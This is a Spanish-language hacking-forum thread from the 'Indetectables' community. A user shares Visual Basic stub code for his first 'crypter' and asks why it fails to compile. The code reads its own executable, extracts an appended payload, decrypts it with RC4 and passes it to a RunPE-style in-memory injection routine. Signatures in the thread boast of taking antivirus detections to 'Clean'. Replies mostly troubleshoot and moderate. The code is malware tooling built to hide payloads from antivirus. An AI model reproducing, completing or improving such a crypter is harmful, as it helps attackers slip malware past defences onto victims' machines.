Hola a todos
vereis tengo un problema
estaba yo tan contento de haber terminado mi primer crypter y al compilarlo , no funciona
Sub main()
Dim Yo As String, datos As String, sdata() As String
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
datos = Space(LOF(1))
Get #1, , datos
Close #1
sdata() = Split(datos, "##$$##")
sdata(1) = RC4(sdata(1), "uxisarthanksskyweb07")
injec App.Path & "\" & App.EXEName & ".exe", StrConv(sdata(1), vbFromUnicode)
y el error lo que pone es : procedimiento sub o function no definido
podriais ayudarme por favor ? el video es de skyweb07 , que hizo un video y lo comparo con su codigo y es igual , o eso parece
Gracias a todos , saludos
Imagen

<< Proceso de avs que detectan un server antes de pasar por indetectables y despues >>
Detect... >>Clean
Cuando me preguntaron sobre algún arma capaz de contrarrestar el poder de la bomba atómica yo sugerí la mejor de todas: La paz.
Albert Einstein
En vez de Injec no sera Inject
Imagen

"Me saltó el avira cuando estaba mirando la foto de slandg... ¿como puedo modearlo? " - Skillmax
Nunca vi el video pero creo que el error es que te hace falta colocar end sub abajo ya que no aparece en ese code que tenes

Saludos
¿Si usted muriera hoy esta seguro que iría al cielo?
http://www.antesdelfin.com/salvo.html

© Indetectables Team
D@rB-15 escribió:En vez de Injec no sera Inject
no :S , en el video pone injec , y probando inject como dices , no me sale :S
si aporta algo estan hechos en un modulo para que asi pese menos el stub , bueno en dos , en uno el stub y en otro la memoria , el RunPe.
me señala el injec , pero puede ser por culpa de la parte restante del codigo.
en general se pone el RC4 al igual que en el cliente
y luego :
injec App.Path & "\" & App.EXEName & ".exe" -- > ese codigo estaba sustituido por una variable denominada Yo , para aorrar el escribir , al principio lo puse con la variable pero luego por si acaso aunque sabia que no pasaria nada lo cambie.
P.D = Estoy comunicandome por el msn con un user que ha posteado , si no conseguimos solucionarlo edito y pondre , bueno eso que no esta arreglado , gracias a todos enserio
p.d.2 [edit] = Codigo cambiado solo un sdata(2)) en vez del password que encriptaria
Sub main()
Dim Yo As String, datos As String, sdata() As String
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
datos = Space(LOF(1))
Get #1, , datos
Close #1
sdata() = Split(datos, "##$$##")
sdata(1) = RC4(sdata(1), sdata(2))
injec App.Path & "\" & App.EXEName & ".exe", StrConv(sdata(1), vbFromUnicode), vbNullString
End Sub
en vez del password que se puede ver en el codigo anterior
Imagen

<< Proceso de avs que detectan un server antes de pasar por indetectables y despues >>
Detect... >>Clean
Cuando me preguntaron sobre algún arma capaz de contrarrestar el poder de la bomba atómica yo sugerí la mejor de todas: La paz.
Albert Einstein
Tienes que postear esto en la sección adecuada:
http://www.indetectables.net/foro/viewforum.php?f=13

Si no compila VB tiene que devolverte un error

Mira que error devuelve, busca en la documentación de VB o San Google y
encontrarás seguramente la respuesta

Pero ante todo hay que entender el código, no vale copiar / pegar o aprenderse
de memoria las cosas, hay que comprenderlas, si no lo haces así serás incapaz
de depurar y desarrollar tus propias aplicaciones.

Un saludo y suerte
tk68 escribió:Pero ante todo hay que entender el código, no vale copiar / pegar o aprenderse
de memoria las cosas, hay que comprenderlas, si no lo haces así serás incapaz
de depurar y desarrollar tus propias aplicaciones.
Es verdad, es preferible que aprendas a programar en Visual Basic antes de intentar descifrar las acciones que realiza el programa.
Todos quieren sacar una herramienta propia, siempre con el fin de ayudar a los demás (o al programador mismo XD), aunque esta no es la mejor manera (Copy---> Paste)

Yo estuve aprendiendo con este: "Curso Multimedia Programación en Visual Y C luisbonilla.com". La verdad es simple para empezar.
Imagen
Cultura de foros en general:
* para postear código fuente se utiliza la etiqueta 'code'
--ejemplo:

Código: Seleccionar todo

void* you = NULL; you = this::getSingletonPtr()->f_ck( your_mom );
(el ejemplo no es más que eso, un ejemplo)

* cada thread se postea en su foro correspondiente
en este caso, se postea en 'Desarrollo y dudas de programación'

Movido. la próxima, elimino thread.
(MD5 checksum error.)
perdon , por el tema , creia que lo habia puesto bien , no copy paste no es , skyweb07 explica cada cosa y lo comprendo , si no entiendo algo lo dejo seguro , y lo intento cuando tenga mas conocimiento , pero entiendo todo.
gracias a todos , ya esta solucionado era un problema con el RunPe que me soluciono dark_javier , gracias y disculpas , no sabia lo de code
Imagen

Detect... >>Clean
Albert Einstein
verbal escribió:

Código: Seleccionar todo

void* you = NULL; you = this::getSingletonPtr()->f_ck( your_mom );
(el ejemplo no es más que eso, un ejemplo)
Jajaja
Saludos
http://www.freundt-esta-aburrido.blogspot.com
Responder

Volver a “VB/.NET”